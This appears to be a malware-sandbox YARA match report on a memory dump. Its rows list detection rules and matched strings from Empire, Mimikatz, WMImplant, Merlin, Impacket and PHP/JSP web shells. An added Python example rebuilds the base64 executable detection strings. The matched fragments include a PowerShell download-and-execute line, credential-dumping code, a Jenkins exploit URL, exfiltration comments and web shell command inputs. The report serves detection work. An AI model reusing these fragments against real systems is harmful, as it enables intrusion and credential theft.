00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | PowerShdll | Detects hack tool PowerShdll | Florian Roth | - 0x10f34:$x2: \PowerShdll.dll
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WMImplant | Auto-generated rule - file WMImplant.ps1 | Florian Roth | - 0x1a8c0:$x1: Invoke-ProcessPunisher -Creds $RemoteCredential
- 0x1a8f4:$x2: $Target -query "SELECT * FROM Win32_NTLogEvent WHERE (logfile='security')
- 0x1a942:$x3: WMImplant -Creds
- 0x1a957:$x4: -Download -RemoteFile C:\passwords.txt
- 0x1a982:$x5: -Command 'powershell.exe -command "Enable-PSRemoting
- 0x1a9bb:$x6: Invoke-WMImplant
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Invoke_PSImage | Detects a command to execute PowerShell from String | Florian Roth | - 0x9800:$: IEX([System.Text.Encoding]::ASCII.GetString(
- 0x982f:$: System.Drawing.Bitmap((a Net.WebClient).OpenRead(
- 0x9863:$: 89 50 4E 47 0D 0A 1A 0A 00 00 00 0D 49 48 44 52 00 00 04 E4 00 00 03 A0 08 06 00 00 00 9D AF A9 ...
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | merlinAgent | Detects Merlin agent | Hilko Bengen | - 0xc8e9:$x1: Command output:\x0D\x0A\x0D\x0A%s
- 0xc903:$x2: [-]Connecting to web server at %s to update agent configuration information.
- 0xc954:$x3: [-]%d out of %d total failed checkins
- 0xc97e:$x4: [!}Unknown AgentControl message type received %s
- 0xc9b3:$x5: [-]Received Agent Kill Message
- 0xc9d6:$x6: [-]Received Server OK, doing nothing
- 0xc9ff:$x7: [!]There was an error with the HTTP client while performing a POST:
- 0xca47:$x8: [-]Sleeping for %s at %s
- 0xca64:$s1: Executing command %s %s %s
- 0xca83:$s2: [+]Host Information:
- 0xca9c:$s3: \x09Hostname: %s
- 0xcaae:$s4: \x09Platform: %s
- 0xcac0:$s5: \x09User GUID: %s
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Invoke_OSiRis | Osiris Device Guard Bypass - file Invoke-OSiRis.ps1 | Florian Roth | - 0x173a1:$x1: $null = Iwmi Win32_Process -EnableA -Impers 3 -AuthenPacketprivacy -Name Create -Arg $ObfusK -Computer $Target
- 0x172cc:$x2: Invoke-OSiRis
- 0x17414:$x2: Invoke-OSiRis
- 0x17426:$x3: -Arg@{Name=$VarName;VariableValue=$OSiRis;UserName=$env:Username}
- 0x1746c:$x4: Device Guard Bypass Command Execution
- 0x17496:$x5: -Put Payload in Win32_OSRecoveryConfiguration DebugFilePath
- 0x173a1:$x6: $null = Iwmi Win32_Process -EnableA -Impers 3 -AuthenPacketprivacy -Name Create
- 0x174d6:$x6: $null = Iwmi Win32_Process -EnableA -Impers 3 -AuthenPacketprivacy -Name Create
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | SUSP_Double_Base64_Encoded_Executable | Detects an executable that has been encoded with base64 twice | Florian Roth | - 0x182a3:$: VFZwVEFRR
- 0x182af:$: RWcFRBUU
- 0x182ba:$: UVnBUQVFF
- 0x182c6:$: VFZvQUFBQ
- 0x182d2:$: RWb0FBQU
- 0x182dd:$: UVm9BQUFB
- 0x182e9:$: VFZxQUFBR
- 0x182f5:$: RWcUFBQU
- 0x18300:$: UVnFBQUFF
- 0x1830c:$: VFZwUUFBS
- 0x18318:$: RWcFFBQU
- 0x18323:$: UVnBRQUFJ
- 0x1832f:$: VFZxUUFBT
- 0x1833b:$: RWcVFBQU
- 0x18346:$: UVnFRQUFN
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | SUSP_Reversed_Base64_Encoded_EXE | Detects a base64 encoded executable with reversed characters | Florian Roth | - 0x18456:$s1: AEAAAAEQATpVT
- 0x18468:$s2: AAAAAAAAAAoVT
- 0x1847a:$s3: AEAAAAEAAAqVT
- 0x1848c:$s4: AEAAAAIAAQpVT
- 0x1849e:$s5: AEAAAAMAAQqVT
- 0x184b1:$sh1: SZk9WbgM1TEBibpBib1JHIlJGI09mbuF2Yg0WYyd2byBHIzlGaU
- 0x184ea:$sh2: LlR2btByUPREIulGIuVncgUmYgQ3bu5WYjBSbhJ3ZvJHcgMXaoR
- 0x18523:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV
|
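The two rules above (SUSP_Double_Base64_Encoded_Executable and SUSP_Reversed_Base64_Encoded_EXE) carry three strings per header variant because a base64 encoder emits different characters depending on where a byte sequence falls within a 3-byte group, so a detector cannot know at which alignment the MZ header or the DOS stub message was encoded. The Python below is an added worked example, not part of the sandbox report or of the signature-base rules: it builds a constructed PE stub (assumed sample input), produces the double-base64 and reversed-base64 forms at all three alignments, checks them against the rule strings copied from the rows above, and decodes the alignment-0 strings back to the DOS header bytes they stand for. Function and variable names are my own.

```python
from __future__ import annotations

import base64

# Constructed sample (not from the report): the first 16 bytes of a standard
# DOS header, zero padding up to offset 0x40, the usual DOS stub code and the
# stub message, so that "This program cannot be run in DOS mode." sits at
# offset 78 as it does in a typical PE file.
SAMPLE_PE_STUB = (
    b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00"
    + b"\x00" * 48
    + b"\x0e\x1f\xba\x0e\x00\xb4\x09\xcd\x21\xb8\x01\x4c\xcd\x21"
    + b"This program cannot be run in DOS mode.\r\r\n$"
)

# Strings copied from the two rules as listed in the report above. Each row of
# DOUBLE_B64_STRINGS is one MZ header variant at the three base64 alignments.
DOUBLE_B64_STRINGS = [
    "VFZwVEFRR", "RWcFRBUU", "UVnBUQVFF",
    "VFZvQUFBQ", "RWb0FBQU", "UVm9BQUFB",
    "VFZxQUFBR", "RWcUFBQU", "UVnFBQUFF",
    "VFZwUUFBS", "RWcFFBQU", "UVnBRQUFJ",
    "VFZxUUFBT", "RWcVFBQU", "UVnFRQUFN",
]
REVERSED_B64_STRINGS = [
    "AEAAAAEQATpVT", "AAAAAAAAAAoVT", "AEAAAAEAAAqVT",
    "AEAAAAIAAQpVT", "AEAAAAMAAQqVT",
    "SZk9WbgM1TEBibpBib1JHIlJGI09mbuF2Yg0WYyd2byBHIzlGaU",
    "LlR2btByUPREIulGIuVncgUmYgQ3bu5WYjBSbhJ3ZvJHcgMXaoR",
    "uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV",
]

# Number of leading base64 characters whose value depends on the (unknown)
# bytes that precede `data` when `data` starts `shift` bytes into a 3-byte group.
_PAD_DEPENDENT_CHARS = {0: 0, 1: 2, 2: 3}


def aligned_base64(data: bytes, shift: int) -> str:
    """Base64 of `data` as it appears when `shift` bytes precede it in the
    encoded buffer, with the characters that depend on those bytes dropped."""
    encoded = base64.b64encode(b"\x00" * shift + data).decode("ascii")
    return encoded[_PAD_DEPENDENT_CHARS[shift]:]


def double_base64_variants(data: bytes) -> list[str]:
    """base64(base64(data)) for the three alignments of the inner string."""
    inner = base64.b64encode(data)
    return [aligned_base64(inner, shift) for shift in range(3)]


def reversed_base64_variants(data: bytes) -> list[str]:
    """reverse(base64(data)) for the three alignments of `data`."""
    return [aligned_base64(data, shift)[::-1] for shift in range(3)]


def recover_mz_prefix(rule_string: str) -> bytes:
    """Decode an alignment-0 double-base64 rule string (the 9-character ones
    starting with 'VFZ') back to the DOS header bytes it stands for."""
    inner = base64.b64decode(rule_string[:8])   # 8 outer chars -> 6 inner chars
    return base64.b64decode(inner + b"==")       # 6 inner chars -> 4 header bytes


def scan(text: str) -> dict[str, list[str]]:
    """Which rule strings occur in `text`, keyed by rule name."""
    return {
        "SUSP_Double_Base64_Encoded_Executable": [s for s in DOUBLE_B64_STRINGS if s in text],
        "SUSP_Reversed_Base64_Encoded_EXE": [s for s in REVERSED_B64_STRINGS if s in text],
    }


if __name__ == "__main__":
    for label, variants in (("double", double_base64_variants(SAMPLE_PE_STUB)),
                            ("reversed", reversed_base64_variants(SAMPLE_PE_STUB))):
        for shift, blob in enumerate(variants):
            print(label, "shift", shift, scan(blob))
    for s in DOUBLE_B64_STRINGS[::3]:
        print(s, "->", recover_mz_prefix(s))
```

Run directly, it prints which strings each alignment triggers: every shift of the double-encoded stub hits exactly one string of the MZ\x90 triple, and the reversed stub hits one of the three $sh strings (the reversed "This program cannot be run in DOS mode" message) per shift plus the $s5 header string at shift 0. `recover_mz_prefix` shows that the five string groups stand for the header prefixes MZ\x90\x00 (the common stub), MZP\x00 (Borland/Delphi linkers), MZ\x00\x00, MZ\x80\x00 and MZS\x01.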
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | SUSP_Script_Base64_Blocks_Jun20_1 | Detects suspicious file with base64 encoded payload in blocks | Florian Roth | - 0x18634:$sa1: <script language=
- 0x4966d:$sa1: <script language=
- 0x53353:$sa1: <script language=
- 0x1864b:$sb2: 41 41 41 22 2B 0D 0A 22 41 41 41
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | SUSP_Reversed_Hacktool_Author | Detects reversed hack tool author handles (the strings are gentilkiwi and @subtee written backwards) | Florian Roth | - 0x1875b:$x1: iwiklitneg
- 0x1876a:$x2: eetbus@
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | SUSP_Base64_Encoded_Hacktool_Dev | Detects a suspicious base64 encoded keyword | Florian Roth | - 0x1883b:$: QGdlbnRpbGtpd2
- 0x1884c:$: BnZW50aWxraXdp
- 0x1885d:$: AZ2VudGlsa2l3a
- 0x1886e:$: QGhhcm1qMH
- 0x1887b:$: BoYXJtajB5
- 0x18888:$: AaGFybWowe
- 0x18895:$: IEBzdWJ0ZW
- 0x188a2:$: BAc3VidGVl
- 0x188af:$: gQHN1YnRlZ
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire_Invoke_MetasploitPayload | Detects Empire component - file Invoke-MetasploitPayload.ps1 | Florian Roth | - 0x2771:$s1: $ProcessInfo.Arguments="-nop -c $DownloadCradle"
- 0x27a6:$s2: $PowershellExe=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire_Exploit_Jenkins | Detects Empire component - file Exploit-Jenkins.ps1 | Florian Roth | - 0x2924:$s1: $postdata="script=println+new+ProcessBuilder%28%27"+$($Cmd)+"
- 0x2966:$s2: $url = "http://"+$($Rhost)+":"+$($Port)+"/script"
- 0x299c:$s3: $Cmd = [System.Web.HttpUtility]::UrlEncode($Cmd)
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire_Get_SecurityPackages | Detects Empire component - file Get-SecurityPackages.ps1 | Florian Roth | - 0x2b08:$s1: $null = $EnumBuilder.DefineLiteral('LOGON', 0x2000)
- 0x2b40:$s2: $EnumBuilder = $ModuleBuilder.DefineEnum('SSPI.SECPKG_FLAG', 'Public', [Int32])
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire_Invoke_PowerDump | Detects Empire component - file Invoke-PowerDump.ps1 | Florian Roth | - 0x2cc4:$x16: $enc = Get-PostHashdumpScript
- 0x2ce7:$x19: $lmhash = DecryptSingleHash $rid $hbootkey $enc_lm_hash $almpassword;
- 0x2d32:$x20: $rc4_key = $md5.ComputeHash($hbootkey[0..0x0f] + [BitConverter]::GetBytes($rid) + $lmntstr);
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire_Install_SSP | Detects Empire component - file Install-SSP.ps1 | Florian Roth | - 0x2eb8:$s1: Install-SSP -Path .\mimilib.dll
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire_Invoke_ShellcodeMSIL | Detects Empire component - file Invoke-ShellcodeMSIL.ps1 | Florian Roth | - 0x3013:$s1: $FinalShellcode.Length
- 0x302e:$s2: @(0x60,0xE8,0x04,0,0,0,0x61,0x31,0xC0,0xC3)
- 0x305e:$s3: @(0x41,0x54,0x41,0x55,0x41,0x56,0x41,0x57,
- 0x308d:$s4: $TargetMethod.Invoke($null, @(0x11112222)) | Out-Null
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | HKTL_Empire_PowerUp | Detects Empire component - file PowerUp.ps1 | Florian Roth | - 0x31e9:$x2: $PoolPasswordCmd = 'c:\windows\system32\inetsrv\appcmd.exe list apppool
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire_Invoke_Mimikatz_Gen | Detects Empire component - file Invoke-Mimikatz.ps1 | Florian Roth | - 0x3366:$s1: = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQ
- 0x11cef:$s1: = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQ
- 0x12205:$s1: = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQ
- 0x338f:$s2: Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($PEBytes64, $PEBytes32, "Void", 0, "", $ExeArgs)
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire_Get_GPPPassword | Detects Empire component - file Get-GPPPassword.ps1 | Florian Roth | - 0x3530:$s1: $Base64Decoded = [Convert]::FromBase64String($Cpassword)
- 0x356d:$s2: $XMlFiles += Get-ChildItem -Path "\\$DomainController\SYSVOL" -Recurse
- 0x35b8:$s3: function Get-DecryptedCpassword {
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire_Invoke_SmbScanner | Detects Empire component - file Invoke-SmbScanner.ps1 | Florian Roth | - 0x370f:$s1: $up = Test-Connection -count 1 -Quiet -ComputerName $Computer
- 0x3752:$s2: $out | add-member Noteproperty 'Password' $Password
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire_Exploit_JBoss | Detects Empire component - file Exploit-JBoss.ps1 | Florian Roth | - 0x37c7:$s1: Exploit-JBoss
- 0x38b3:$s1: Exploit-JBoss
- 0x38c5:$s2: $URL = "http$($SSL)://" + $($Rhost) + ':' + $($Port)
- 0x38fe:$s3: "/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service
- 0x3946:$s4: http://blog.rvrsh3ll.net
- 0x3963:$s5: Remote URL to your own WARFile to deploy.
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire_dumpCredStore | Detects Empire component - file dumpCredStore.ps1 | Florian Roth | - 0x3aba:$x1: [DllImport("Advapi32.dll", SetLastError = true, EntryPoint = "CredReadW"
- 0x3b08:$s12: [String] $Msg = "Failed to enumerate credentials store for user '$Env:UserName'"
- 0x3b5e:$s15: Rtn = CredRead("Target", CRED_TYPE.GENERIC, out Cred);
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire_Invoke_EgressCheck | Detects Empire component - file Invoke-EgressCheck.ps1 | Florian Roth | - 0x3ccc:$s1: egress -ip $ip -port $c -delay $delay -protocol $protocol
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire_Out_Minidump | Detects Empire component - file Out-Minidump.ps1 | Florian Roth | - 0x3fbc:$s1: $Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle,
- 0x3ffd:$s2: $ProcessFileName = "$($ProcessName)_$($ProcessId).dmp"
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire_Invoke_PsExec | Detects Empire component - file Invoke-PsExec.ps1 | Florian Roth | - 0x4161:$s1: Invoke-PsExecCmd
- 0x4176:$s2: "[*] Executing service .EXE
- 0x4196:$s3: $cmd = "%COMSPEC% /C echo $Command ^> %systemroot%\Temp\
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire_Invoke_PostExfil | Detects Empire component - file Invoke-PostExfil.ps1 | Florian Roth | - 0x4302:$s1: # upload to a specified exfil URI
- 0x4328:$s2: Server path to exfil to.
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire_Invoke_SMBAutoBrute | Detects Empire component - file Invoke-SMBAutoBrute.ps1 | Florian Roth | - 0x447a:$s1: [*] PDC: LAB-2008-DC1.lab.com
- 0x449c:$s2: $attempts = Get-UserBadPwdCount $userid $dcs
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire_Get_Keystrokes | Detects Empire component - file Get-Keystrokes.ps1 | Florian Roth | - 0x45f8:$s1: $RightMouse = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RButton) -band 0x8000) -eq 0x8000
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire_Invoke_DllInjection | Detects Empire component - file Invoke-DllInjection.ps1 | Florian Roth | - 0x4797:$s1: -Dll evil.dll
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire_KeePassConfig | Detects Empire component - file KeePassConfig.ps1 | Florian Roth | - 0x48d2:$s1: $UserMasterKeyFiles = @(, $(Get-ChildItem -Path $UserMasterKeyFolder -Force | Select-Object -ExpandProperty FullName) )
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire_Invoke_SSHCommand | Detects Empire component - file Invoke-SSHCommand.ps1 | Florian Roth | - 0x4a7f:$s1: $Base64 = 'TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAA
- 0x4aba:$s2: Invoke-SSHCommand -ip 192.168.1.100 -Username root -Password test -Command "id"
- 0x4b0e:$s3: Write-Verbose "[*] Error loading dll"
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire_PowerShell_Framework_Gen1 | Detects Empire component | Florian Roth | - 0x4d7b:$s1: Write-BytesToMemory -Bytes $Shellcode
- 0x96d1:$s1: Write-BytesToMemory -Bytes $Shellcode
- 0x11dd9:$s1: Write-BytesToMemory -Bytes $Shellcode
- 0x4da5:$s2: $GetCommandLineAAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineAAddrTemp ($Shellcode1.Length)
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire_PowerUp_Gen | Detects Empire component - from files PowerUp.ps1, PowerUp.ps1 | Florian Roth | - 0x4f49:$s1: $Result = sc.exe config $($TargetService.Name) binPath= $OriginalPath
- 0x4f93:$s2: $Result = sc.exe pause $($TargetService.Name)
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire_PowerShell_Framework_Gen2 | Detects Empire component | Florian Roth | - 0x5208:$x1: $DllMain = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DllMainPtr, $DllMainDelegate)
- 0x527f:$s20: #Shellcode: CallDllMain.asm
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire_Agent_Gen | Detects Empire component - from files agent.ps1, agent.ps1 | Florian Roth | - 0x541f:$s1: $wc.Headers.Add("User-Agent",$script:UserAgent)
- 0x5453:$s2: $min = [int]((1-$script:AgentJitter)*$script:AgentDelay)
- 0x5490:$s3: if ($script:AgentDelay -ne 0){
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire_PowerShell_Framework_Gen3 | Detects Empire component | Florian Roth | - 0x56af:$s1: if (($PEInfo.FileType -ieq "DLL") -and ($RemoteProcHandle -eq [IntPtr]::Zero))
- 0x5702:$s2: remote DLL injection
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire_Invoke_InveighRelay_Gen | Detects Empire component - from files Invoke-InveighRelay.ps1, Invoke-InveighRelay.ps1 | Florian Roth | - 0x587e:$s1: $inveigh.SMBRelay_failed_list.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string $SMBRelayTarget")
- 0x58e7:$s2: $NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes)
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire_KeePassConfig_Gen | Detects Empire component - from files KeePassConfig.ps1, KeePassConfig.ps1 | Florian Roth | - 0x5a88:$s1: $KeePassXML = [xml](Get-Content -Path $KeePassXMLPath)
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire_Invoke_Portscan_Gen | Detects Empire component - from files Invoke-Portscan.ps1, Invoke-Portscan.ps1 | Florian Roth | - 0x5c1a:$s1: Test-Port -h $h -p $Port -timeout $Timeout
- 0x5c49:$s2: 1 {$nHosts=10; $Threads = 32; $Timeout = 5000 }
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire_PowerShell_Framework_Gen4 | Detects Empire component | Florian Roth | - 0x6027:$s1: Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }
- 0x6089:$s2: # Get a handle to the module specified
- 0x60b4:$s3: $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))
- 0x60f3:$s4: $DynAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate')
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire_Invoke_CredentialInjection_Invoke_Mimikatz_Gen | Detects Empire component - from files Invoke-CredentialInjection.ps1, Invoke-Mimikatz.ps1 | Florian Roth | - 0x6309:$s1: $PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs -RemoteProcHandle $RemoteProcHandle
- 0x6309:$s2: $PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs
- 0x637e:$s2: $PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire_Invoke_Gen | Detects Empire component - from files Invoke-DCSync.ps1, Invoke-PSInject.ps1, Invoke-ReflectivePEInjection.ps1 | Florian Roth | - 0x65cb:$s1: $Shellcode1 += 0x48
- 0x65e3:$s2: $PEHandle = [IntPtr]::Zero
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire_PowerShell_Framework_Gen5 | Detects Empire component | Florian Roth | - 0x67b7:$s1: if ($ExeArgs -ne $null -and $ExeArgs -ne '')
- 0x67e8:$s2: $ExeArgs = "ReflectiveExe $ExeArgs"
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Impacket_Tools_Generic_1 | Compiled Impacket Tools | Florian Roth | - 0x93a3:$s1: bpywintypes27.dll
- 0x93b9:$s2: hZFtPC
- 0x7036:$s3: impacket
- 0x7187:$s3: impacket
- 0x72d9:$s3: impacket
- 0x735b:$s3: impacket
- 0x7415:$s3: impacket
- 0x754b:$s3: impacket
- 0x75d8:$s3: impacket
- 0x768d:$s3: impacket
- 0x77b6:$s3: impacket
- 0x78fb:$s3: impacket
- 0x797d:$s3: impacket
- 0x7a44:$s3: impacket
- 0x7aca:$s3: impacket
- 0x7b84:$s3: impacket
- 0x7bf9:$s3: impacket
- 0x7cbf:$s3: impacket
- 0x7dfe:$s3: impacket
- 0x7e7e:$s3: impacket
- 0x7f37:$s3: impacket
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Invoke_mimikittenz | Detects Mimikittenz - file Invoke-mimikittenz.ps1 | Florian Roth | - 0xee56:$x1: [mimikittenz.MemProcInspector]
- 0xee79:$s1: PROCESS_ALL_ACCESS = PROCESS_TERMINATE | PROCESS_CREATE_THREAD | PROCESS_SET_SESSIONID | PROCESS_VM_OPERATION |
- 0xeeed:$s2: IntPtr processHandle = MInterop.OpenProcess(MInterop.PROCESS_WM_READ | MInterop.PROCESS_QUERY_INFORMATION, false, process.Id);
- 0xef70:$s3: &email=.{1,48}&create=.{1,2}&password=.{1,22}&metadata1=
- 0xefad:$s4: [DllImport("kernel32.dll", SetLastError = true)]
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | JoeSecurity_PowerSploit | Yara detected PowerSploit | Joe Security | |
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | JoeSecurity_UACMe | Yara detected UACMe UAC Bypass tool | Joe Security | |
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | JoeSecurity_Mimikatz_1 | Yara detected Mimikatz | Joe Security | |
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | JoeSecurity_Codoso_Ghost | Yara detected Codoso Ghost | Joe Security | |
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | JoeSecurity_Meterpreter | Yara detected Meterpreter | Joe Security | |
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | JoeSecurity_CobaltStrike | Yara detected CobaltStrike | Joe Security | |
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Empire__Users_neo_code_Workspace_Empire_4sigs_PowerUp | Detects Empire component - file PowerUp.ps1 | Florian Roth | - 0x31e9:$x2: $PoolPasswordCmd = 'c:\windows\system32\inetsrv\appcmd.exe list apppool
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_h4ntu_shell_powered_by_tsoi_ | Web Shell - file h4ntu shell [powered by tsoi | unknown | - 0x1b181:$s0: <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>Server Adress:</b
- 0x1b1d4:$s3: <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><b>User Info:</b> ui
- 0x1b227:$s4: <TD><DIV STYLE="font-family: verdana; font-size: 10px;"><?= $info ?>: <?=
- 0x1b27a:$s5: <INPUT TYPE="text" NAME="cmd" value="<?php echo stripslashes(htmlentities($
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_PHP_sql | Web Shell - file sql.php | Florian Roth | - 0x1b388:$s0: $result=mysql_list_tables($db) or die ("$h_error<b>".mysql_error()."</b>$f_
- 0x1b3d8:$s4: print "<a href=\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&
- 0x37a21:$s4: print "<a href=\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_PHP_a | Web Shell - file a.php | Florian Roth | - 0x1b4dc:$s1: echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"
- 0x57066:$s1: echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"
- 0x1b525:$s2: echo "<option value=\"$work_dir\" selected>Current Directory</option>
- 0x52ce6:$s2: echo "<option value=\"$work_dir\" selected>Current Directory</option>
- 0x570d8:$s2: echo "<option value=\"$work_dir\" selected>Current Directory</option>
- 0x1b56f:$s4: <input name="submit_btn" type="submit" value="Execute Command"></p>
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_iMHaPFtp_2 | Web Shell - file iMHaPFtp.php | Florian Roth | - 0x1b67e:$s8: if ($l) echo '<a href="' . $self . '?action=permission&file=' . urlencode($
- 0x1b6d2:$s9: return base64_decode('R0lGODlhEQANAJEDAMwAAP///5mZmf///yH5BAHoAwMALAAAAAARAA0AAA
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_Jspspyweb | Web Shell - file Jspspyweb.jsp | Florian Roth | - 0x1b7ed:$s0: out.print("<tr><td width='60%'>"+strCut(convertPath(list[i].getPath()),7
- 0x1b840:$s3: "reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_Safe_Mode_Bypass_PHP_4_4_2_and_PHP_5_1_2 | Web Shell - file Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php | Florian Roth | - 0x1b98c:$s0: die("\nWelcome.. By This script you can jump in the (Safe Mode=ON) .. Enjoy\n
- 0x1b9de:$s1: Mode Shell v1.0</font></span></a></font><font face="Webdings" size="6" color
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_SimAttacker_Vrsion_1_0_0_priv8_4_My_friend | Web Shell - file SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php | Florian Roth | - 0x1bb3b:$s2: echo "<a href='?id=fm&fchmod=$dir$file'><span style='text-decoration: none'><fo
- 0x1bb8f:$s3: fputs ($fp ,"\n*********************************************\nWelcome T0 Sim
- 0x31bbb:$s3: fputs ($fp ,"\n*********************************************\nWelcome T0 Sim
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_phpshell_2_1_pwhash | Web Shell - file pwhash.php | Florian Roth | - 0x1bcad:$s1: <tt> </tt>" (space), "<tt>[</tt>" (left bracket), "<tt>|</tt>" (pi
- 0x1bcf9:$s3: word: "<tt>null</tt>", "<tt>yes</tt>", "<tt>no</tt>", "<tt>true</tt>",
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_PHPRemoteView | Web Shell - file PHPRemoteView.php | Florian Roth | - 0x1be12:$s2: <input type=submit value='".mm("Delete all dir/files recursive")." (rm -fr)'
- 0x33525:$s2: <input type=submit value='".mm("Delete all dir/files recursive")." (rm -fr)'
- 0x1be63:$s4: <a href='$self?c=delete&c2=$c2&confirm=delete&d=".urlencode($d)."&f=".u
- 0x1c347:$s4: <a href='$self?c=delete&c2=$c2&confirm=delete&d=".urlencode($d)."&f=".u
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_jsp_12302 | Web Shell - file 12302.jsp | Florian Roth | - 0x1bf71:$s0: </font><%out.print(request.getRealPath(request.getServletPath())); %>
- 0x1bfbb:$s1: <%@page import="java.io.*,java.util.*,java.net.*"%>
- 0x1bff3:$s4: String path=new String(request.getParameter("path").getBytes("ISO-8859-1"
- 0x1fc72:$s4: String path=new String(request.getParameter("path").getBytes("ISO-8859-1"
- 0x232b1:$s4: String path=new String(request.getParameter("path").getBytes("ISO-8859-1"
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_caidao_shell_guo | Web Shell - file guo.php | Florian Roth | - 0x1c108:$s0: <?php ($www= $_POST['ice'])!
